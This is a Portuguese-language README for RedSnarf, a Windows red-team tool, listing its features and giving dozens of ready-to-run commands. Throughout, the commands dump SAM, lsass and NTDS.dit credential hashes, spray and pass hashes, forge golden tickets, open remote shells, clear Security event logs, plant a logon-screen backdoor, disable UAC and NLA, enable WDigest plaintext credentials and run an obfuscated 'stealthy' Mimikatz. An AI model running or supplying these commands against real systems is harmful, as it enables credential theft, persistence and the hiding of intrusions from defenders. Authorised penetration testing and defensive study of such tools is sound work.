
RedSnarf é uma ferramenta de pen-testing / red team para ambientes Windows.
______ .____________ _____
\______ \ ____ __| _/ _____/ ____ _____ ________/ ____\
| _// __ \ / __ |\_____ \ / \\__ \\_ __ \ __\
| | \ ___// /_/ |/ \ | \/ __ \| | \/| |
|____|_ /\___ >____ /_______ /___| (____ /__| |__|
\/ \/ \/ \/ \/ \/
[email protected]
@redsnarf
RedSnarf é uma ferramenta de teste de penetração / equipe vermelha criada por Ed Williams para recuperar hashes e credenciais de estações de trabalho, servidores e controladores de domínio Windows usando Técnicas Seguras de OpSec.
Veja nosso Canal no YouTube para Vídeos https://www.youtube.com/channel/UCDGWRxpHo6d8y6qIeMAXnxQ
A funcionalidade do RedSnarf inclui:
• Recuperação de hashes SAM locais • Enumeração de usuários em execução com privilégios elevados de sistema e suas senhas lsa secrets correspondentes; • Recuperação de credenciais em cache do MS; • Pass-the-hash; • Identificar rapidamente combinações fracas e adivinháveis de nome de usuário/senha (padrão de administrator/Password01); • Capacidade de recuperar hashes em uma faixa; • Hash spraying - Credsfile aceitará uma mistura de pwdump, fgdump e nome de usuário e senha em texto simples separados por um espaço; • Despejo de Lsass para análise offline com Mimikatz; • Despejo de hashes de controlador de domínio usando NTDSUtil e recuperação de NTDS.dit para análise local; • Despejo de hashes de controlador de domínio usando o método drsuapi; • Recuperação da pasta Scripts e Policies de um controlador de domínio e análise por 'password' e 'administrator'; • Capacidade de descriptografar hashes cpassword; • Capacidade de iniciar um shell em uma máquina remota; • Capacidade de limpar os logs de eventos (aplicativo, segurança, configuração ou sistema); (Apenas versão interna) • Os resultados são salvos por host para análise. • Ativar/Desativar RDP em uma máquina remota. • Alterar a porta RDP de 3389 para 443 em uma máquina remota. • Ativar/Desativar NLA em uma máquina remota. • Encontrar onde os usuários estão logados em máquinas remotas. • Backdoor na Tela de Logon do Windows • Ativar/Desativar UAC em uma máquina remota. • Mimikatz furtivo adicionado. • Análise de hashes de domínio • Capacidade de determinar quais contas estão ativadas/desativadas • Tirar uma captura de tela da Área de Trabalho de Usuários Ativos Logados Remotamente • Gravar a Área de Trabalho de Usuários Ativos Logados Remotamente • Descriptografar CPassword do Windows • Descriptografar Senha do WinSCP • Obter SPNs de Usuário • Recuperar senhas WIFI de máquinas remotas
Requisitos: Impacket v0.9.16-dev - https://github.com/CoreSecurity/impacket.git CredDump7 - https://github.com/Neohapsis/creddump7 Recuperação de Lsass usando procdump - https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx Netaddr (0.7.12) - pip install netaddr Termcolor (1.1.0) - pip install termcolor iconv - usado na análise de informações do Mimikatz localmente
Mostrar Ajuda ./redsnarf.py -h ./redsnarf.py --help
Recuperar Hashes Locais de uma única máquina usando credenciais locais fracas e limpando o log de eventos de Segurança ./redsnarf.py -H ip=10.0.0.50 -uC security
Recuperar Hashes Locais de uma única máquina usando credenciais locais fracas e limpando o log de eventos de aplicativo ./redsnarf.py -H ip=10.0.0.50 -uC application
Recuperar Hashes Locais de uma única máquina usando credenciais de administrador local ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d .
Recuperar Hashes Locais de uma única máquina usando credenciais de administrador de domínio ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com
Recuperar Hashes em uma faixa de rede usando credenciais de administrador local ./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d .
Recuperar Hashes em uma faixa de rede usando credenciais de administrador de domínio ./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com
Recuperar Hashes em uma faixa de rede usando credenciais de administrador de domínio ./redsnarf.py -H file=targets.txt -u administrator -p Password01 -d yourdomain.com
Borrifar Hashes em uma faixa de rede ./redsnarf.py -H range=10.0.0.1/24 -hS credsfile -d .
Recuperar Hashes em uma faixa de rede com login de domínio ./redsnarf.py -H range=10.0.0.1/24 -hS credsfile -d yourdomain.com
Verificar Credenciais Rapidamente ./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password1 -d . -cQ y
Verificar Rapidamente Arquivo contendo nomes de usuário (-hS) e uma senha genérica (-hP) ./redsnarf.py -H ip=10.0.0.1 -hS /path/to/usernames.txt -hP PasswordToTry -cQ y
Recuperar Hashes usando o método drsuapi (Mais rápido) Este método suporta uma flag opcional de -q y que consultará o LDAP e exibirá se as contas estão ativas ou desativadas ./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hI y (-hQ y)
Recuperar Hashes usando NTDSUtil Este método suporta uma flag opcional de -q y que consultará o LDAP e exibirá se as contas estão ativas ou desativadas ./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hN y (-hQ y)
Geração de Golden Ticket ./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hT y
Copiar a pasta Policies e Scripts de um Controlador de Domínio e analisar por password e administrator ./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -uP y
Descriptografar Cpassword ./redsnarf.py -uG cpassword
Encontrar Usuário - Ao Vivo /redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com -eL user.name
Encontrar Usuário - Offline (pesquisa informações baixadas anteriormente) /redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com -eO user.name
Exibir Lista de Tarefas de NT AUTHORITY\SYSTEM /redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -eT y
Capturar a Área de Trabalho de um Usuário Ativo Logado Remotamente /redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -eS y
Iniciar um Shell em uma máquina usando credenciais de administrador local ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d . -uD y
Iniciar um Shell em uma máquina usando credenciais de administrador de domínio ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uD y
Recuperar uma cópia do lsass para análise offline com Mimikatz em uma máquina usando credenciais de administrador local ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d . -hL y
Executar mimikatz furtivo, esta opção inicia um servidor web para servir um script powershell, que é ofuscado e codificado do lado da máquina, os dados não tocam no disco - as credenciais são grepped em um estilo fácil de ler e ecoadas de volta para a tela. ./redsnarf.py -H ip=192.168.198.162 -u administrator -p Password01 -cS y -hR y
Executar Comando Personalizado Exemplo 1 ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uX 'net user'
Exemplo 2 - Aspas duplas precisam ser escapadas com
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uX 'dsquery group -name "domain admins" | dsget group -members -expand'
Política de Token de Acesso Local Cria um arquivo batch lat.bat que você pode copiar e colar na máquina remota para executar, o que modificará o registro e habilitará ou desabilitará as configurações da Política de Token de Acesso Local. ./redsnarf.py -rL y
Wdigest Habilitar o valor de registro UseLogonCredential do Wdigest em uma máquina usando credenciais de administrador de domínio ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW e
Desabilitar o valor de registro UseLogonCredential do Wdigest em uma máquina usando credenciais de administrador de domínio ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW d
Consultar o valor de registro UseLogonCredential do Wdigest em uma máquina usando credenciais de administrador de domínio ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW q
UAC Habilitar o valor de registro UAC em uma máquina usando credenciais de administrador de domínio ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU e
Desabilitar o valor de registro UAC em uma máquina usando credenciais de administrador de domínio ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU d
Consultar o valor de registro UAC em uma máquina usando credenciais de administrador de domínio ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU q
Backdoor - Backdoor na Tela do Windows - Pressione Shift Esquerdo + Alt Esquerdo + Print Screen para ativar Habilitar o valor de registro Backdoor em uma máquina usando credenciais de administrador de domínio ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB e
Desabilitar o valor de registro Backdoor em uma máquina usando credenciais de administrador de domínio ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB d
Consultar o valor de registro Backdoor em uma máquina usando credenciais de administrador de domínio ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB q
AutoLogon Habilitar o valor de registro AutoLogon do Windows em uma máquina usando credenciais de administrador de domínio ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rA e
Desabilitar o valor de registro AutoLogon do Windows em uma máquina usando credenciais de administrador de domínio ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rA d
Consultar o valor de registro AutoLogon do Windows em uma máquina usando credenciais de administrador de domínio ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rA q
Bloquear a sessão de usuário de uma máquina remota usando credenciais de administrador de domínio ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uL y
Habilitar RDP em uma máquina usando credenciais de administrador de domínio ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR e
Desabilitar RDP em uma máquina usando credenciais de administrador de domínio ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR d
Consultar o status do RDP em uma máquina usando credenciais de administrador de domínio ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR q
Alterar a Porta RDP de 3389 para 443 - Alterar a Porta RDP para 443 em uma máquina usando credenciais de administrador de domínio ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT e
Alterar a Porta RDP para o padrão 3389 em uma máquina usando credenciais de administrador de domínio ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT d
Consultar o Valor da Porta RDP em uma máquina usando credenciais de administrador de domínio ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT q
Habilitar Multi-RDP com Mimikatz ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uR y
Habilitar RDP SingleSessionPerUser em uma máquina usando credenciais de administrador de domínio ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rM e
Desabilitar RDP SingleSessionPerUser em uma máquina usando credenciais de administrador de domínio ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rM d
Consultar o status do RDP SingleSessionPerUser em uma máquina usando credenciais de administrador de domínio ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rM q
Habilitar NLA em uma máquina usando credenciais de administrador de domínio ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN e
Desabilitar NLA em uma máquina usando credenciais de administrador de domínio ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN d
Consultar o status do NLA em uma máquina usando credenciais de administrador de domínio ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN q